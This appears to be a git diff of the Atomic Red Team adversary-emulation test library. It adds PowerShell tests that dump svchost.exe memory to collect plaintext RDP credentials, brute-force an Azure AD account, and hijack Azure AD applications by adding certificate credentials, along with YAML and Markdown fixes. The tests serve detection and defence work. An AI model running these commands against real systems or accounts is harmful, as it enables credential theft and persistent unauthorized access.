| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
-| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 59dc6eed..4f451fdb 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -2522,11 +2522,15 @@ credential-access:
'aureport --tty' or other audit.d reading tools to read the log output, which
is binary. Mac OS does not currently contain the pam_tty_audit.so library.
\n"
- prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so''
+ dependencies:
+ - description: 'Checking if pam_tty_audit.so is installed
'
- get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and
- recompile, for this test to work"
+ prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so''
+
+'
+ get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
+ and recompile, for this test to work"
'
supported_platforms:
@@ -4062,6 +4066,25 @@ credential-access:
C:\\Windows\\System32\\NPPSpy.dll -ErrorAction Ignore"
name: powershell
elevation_required: true
+ - name: Dump svchost.exe to gather RDP credentials
+ auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
+ description: |
+ The svchost.exe contains the RDP plain-text credentials.
+ Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
+
+ Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
+ if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
+ C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
+ cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
+
+'
+ name: powershell
+ elevation_required: true
T1110.002:
technique:
external_references:
@@ -4425,6 +4448,55 @@ credential-access:
}
}
Write-Host "End of bruteforce"
+ - name: Brute Force Credentials of single Azure AD user
+ auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69
+ description: 'Attempt to brute force Azure AD user via AzureAD powershell module.
+
+'
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Account to bruteforce. We encourage users running this atomic
+ to add a valid microsoft account domain; for eg "bruce.wayne@"
+ type: String
+ default: bruce.wayne@contoso.com
+ passwords:
+ description: List of passwords we will attempt to brute force with
+ type: String
+ default: Password1`n1q2w3e4r`nPassword!
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'AzureAD module must be installed.
+
+'
+ prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Import-Module -Name AzureAD
+
+ $passwords = "#{passwords}".split("{`n}")
+ foreach($password in $passwords) {
+ $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ try {
+ Write-Host " [-] Attempting ${password} on account #{username}."
+ Connect-AzureAD -Credential $Credential 2>&1> $null
+ # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+ Write-Host " [!] #{username}:${password} are valid credentials!`r`n"
+ break
+ } catch {
+ Write-Host " [-] #{username}:${password} invalid credentials.`r`n"
+ }
+ }
+ Write-Host "End of bruteforce"
T1555.005:
technique:
external_references:
@@ -7908,11 +7980,15 @@ collection:
'aureport --tty' or other audit.d reading tools to read the log output, which
is binary. Mac OS does not currently contain the pam_tty_audit.so library.
\n"
- prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so''
+ dependencies:
+ - description: 'Checking if pam_tty_audit.so is installed
'
- get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and
- recompile, for this test to work"
+ prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so''
+
+'
+ get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
+ and recompile, for this test to work"
'
supported_platforms:
@@ -13512,7 +13588,7 @@ privilege-escalation:
command: |
sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
- cleanup: |
+ cleanup_command: |
sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
sudo rm /Library/LaunchDaemons/#{plist_filename}
T1053.004:
@@ -37108,6 +37184,159 @@ persistence:
- Azure AD
identifier: T1098.001
atomic_tests:
+ - name: Azure AD Application Hijacking - Service Principal
+ auto_generated_guid: b8e747c3-bdf7-4d71-bce2-f1df2a057406
+ description: |
+ Add a certificate to an Application through its Service Principal.
+ The certificate can then be used to authenticate as the application and benefit from its rights.
+ An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Azure AD username
+ type: String
+ default: jonh@contoso.com
+ password:
+ description: Azure AD password
+ type: String
+ default: p4sswd
+ service_principal_name:
+ description: Name of the targeted service principal
+ type: String
+ default: SuperSP
+ certificate_password:
+ description: Password of the new certificate
+ type: string
+ default: Passw0rd
+ path_to_cert:
+ description: Path of the new certificate, locally stored
+ type: string
+ default: "$env:TEMP"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'AzureAD module must be installed.
+
+'
+ prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+ executor:
+ command: |
+ Import-Module -Name AzureAD
+ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ Connect-AzureAD -Credential $Credential
+
+ $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
+ if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+ # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
+ $certNotAfter = (Get-Date).AddDays(2)
+ $credNotAfter = (Get-Date).AddDays(1)
+ $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+ $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+ Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd
+
+ $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+ $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+ New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+ Start-Sleep -s 30
+ $tenant=Get-AzureADTenantDetail
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+ Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+ Write-Host "End of Hijacking"
+ cleanup_command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString
+ -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
+ System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
+ $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal
+ -Searchstring \"#{service_principal_name}\"\n$credz = Get-AzureADServicePrincipalKeyCredential
+ -ObjectId $sp.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier)
+ -eq \"AtomicTest\") {\n Remove-AzureADServicePrincipalKeyCredential -ObjectId
+ $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
+ | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"\n"
+ name: powershell
+ elevation_required: false
+ - name: Azure AD Application Hijacking - App Registration
+ auto_generated_guid: a12b5531-acab-4618-a470-0dafb294a87a
+ description: |
+ Add a certificate to an Application through its App Registration.
+ The certificate can then be used to authenticate as the application and benefit from its rights.
+ An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Azure AD username
+ type: String
+ default: jonh@contoso.com
+ password:
+ description: Azure AD password
+ type: String
+ default: p4sswd
+ application_name:
+ description: Name of the targeted application
+ type: String
+ default: SuperApp
+ certificate_password:
+ description: Password of the new certificate
+ type: string
+ default: Passw0rd
+ path_to_cert:
+ description: Path of the new certificate, locally stored
+ type: string
+ default: "$env:TEMP"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'AzureAD module must be installed.
+
+'
+ prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+ executor:
+ command: |
+ Import-Module -Name AzureAD
+ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ Connect-AzureAD -Credential $Credential
+
+ $app = Get-AzureADApplication -Searchstring "#{application_name}"
+ if ($app -eq $null) { Write-Warning "Application not found"; exit }
+ $certNotAfter = (Get-Date).AddDays(2)
+ $credNotAfter = (Get-Date).AddDays(1)
+ $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+ $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+ Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd
+
+ $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+ $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+ New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+ Start-Sleep -s 30
+ $tenant=Get-AzureADTenantDetail
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+ Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+ Write-Host "End of Hijacking"
+ cleanup_command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString
+ -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
+ System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
+ $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication
+ -Searchstring \"#{application_name}\"\n$credz = Get-AzureADApplicationKeyCredential
+ -ObjectId $app.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier)
+ -eq \"AtomicTest\") {\n Remove-AzureADApplicationKeyCredential -ObjectId
+ $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
+ | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"\n"
+ name: powershell
+ elevation_required: false
- name: AWS - Create Access Key and Secret Key
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
description: 'Adversaries create their own new access and secret keys to programatically
@@ -39773,7 +40002,7 @@ persistence:
$User.DisplayName = $SamAccountName
$User.Save()
$User
- cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
+ cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1"
'
name: powershell
@@ -41381,7 +41610,7 @@ persistence:
command: |
sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
- cleanup: |
+ cleanup_command: |
sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
sudo rm /Library/LaunchDaemons/#{plist_filename}
T1053.004:
@@ -51395,7 +51624,7 @@ discovery:
'
name: bash
- elevation_require: true
+ elevation_required: true
- name: Network Share Discovery command prompt
auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
description: |
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index f7c73c92..64a86e77 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -11,6 +11,8 @@ Several of the tools mentioned in associated sub-techniques may be used by both
- [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)
+- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
+
@@ -133,4 +135,41 @@ Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f
+
+
+
+## Atomic Test #3 - Dump svchost.exe to gather RDP credentials
+The svchost.exe contains the RDP plain-text credentials.
+Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
+
+Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
+if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
+C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
+```
+
+
+
+
+
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index d622c125..2d5056a3 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -85,3 +85,23 @@ atomic_tests:
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
name: powershell
elevation_required: true
+
+- name: Dump svchost.exe to gather RDP credentials
+ auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
+ description: |
+ The svchost.exe contains the RDP plain-text credentials.
+ Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
+
+ Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
+ if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
+ C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
+ cleanup_command: |
+ Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
+ name: powershell
+ elevation_required: true
+
diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md
index 76f5881a..88c11054 100644
--- a/atomics/T1056.001/T1056.001.md
+++ b/atomics/T1056.001/T1056.001.md
@@ -93,6 +93,18 @@ sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
+#### Dependencies: Run with `sh`!
+##### Description: Checking if pam_tty_audit.so is installed
+##### Check Prereq Commands:
+```sh
+test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'
+```
+##### Get Prereq Commands:
+```sh
+echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work"
+```
+
+
diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml
index 48d62471..a09fdc50 100644
--- a/atomics/T1056.001/T1056.001.yaml
+++ b/atomics/T1056.001/T1056.001.yaml
@@ -32,10 +32,13 @@ atomic_tests:
Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library.
- prereq_command: |
- test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'
- get_prereq_command: |
- echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work"
+ dependencies:
+ - description: |
+ Checking if pam_tty_audit.so is installed
+ prereq_command: |
+ test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'
+ get_prereq_command: |
+ echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work"
supported_platforms:
- linux
executor:
diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md
index c7e59069..94e5dd99 100644
--- a/atomics/T1098.001/T1098.001.md
+++ b/atomics/T1098.001/T1098.001.md
@@ -8,12 +8,197 @@ In infrastructure-as-a-service (IaaS) environments, after gaining access through
## Atomic Tests
-- [Atomic Test #1 - AWS - Create Access Key and Secret Key](#atomic-test-1---aws---create-access-key-and-secret-key)
+- [Atomic Test #1 - Azure AD Application Hijacking - Service Principal](#atomic-test-1---azure-ad-application-hijacking---service-principal)
+
+- [Atomic Test #2 - Azure AD Application Hijacking - App Registration](#atomic-test-2---azure-ad-application-hijacking---app-registration)
+
+- [Atomic Test #3 - AWS - Create Access Key and Secret Key](#atomic-test-3---aws---create-access-key-and-secret-key)
-## Atomic Test #1 - AWS - Create Access Key and Secret Key
+## Atomic Test #1 - Azure AD Application Hijacking - Service Principal
+Add a certificate to an Application through its Service Principal.
+The certificate can then be used to authenticate as the application and benefit from its rights.
+An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** b8e747c3-bdf7-4d71-bce2-f1df2a057406
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| service_principal_name | Name of the targeted service principal | String | SuperSP|
+| certificate_password | Password of the new certificate | string | Passw0rd|
+| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
+if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
+$certNotAfter = (Get-Date).AddDays(2)
+$credNotAfter = (Get-Date).AddDays(1)
+$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd
+
+$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+Start-Sleep -s 30
+$tenant=Get-AzureADTenantDetail
+$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+Write-Host "End of Hijacking"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
+$credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
+foreach ($cred in $credz) {
+ if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") {
+ Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId
+ }
+}
+Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
+rm "#{path_to_cert}\#{service_principal_name}.pfx"
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+if (Get-Module AzureAD) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #2 - Azure AD Application Hijacking - App Registration
+Add a certificate to an Application through its App Registration.
+The certificate can then be used to authenticate as the application and benefit from its rights.
+An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** a12b5531-acab-4618-a470-0dafb294a87a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| application_name | Name of the targeted application | String | SuperApp|
+| certificate_password | Password of the new certificate | string | Passw0rd|
+| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$app = Get-AzureADApplication -Searchstring "#{application_name}"
+if ($app -eq $null) { Write-Warning "Application not found"; exit }
+$certNotAfter = (Get-Date).AddDays(2)
+$credNotAfter = (Get-Date).AddDays(1)
+$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd
+
+$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+Start-Sleep -s 30
+$tenant=Get-AzureADTenantDetail
+$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+Write-Host "End of Hijacking"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$app = Get-AzureADApplication -Searchstring "#{application_name}"
+$credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
+foreach ($cred in $credz) {
+ if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") {
+ Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId
+ }
+}
+Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
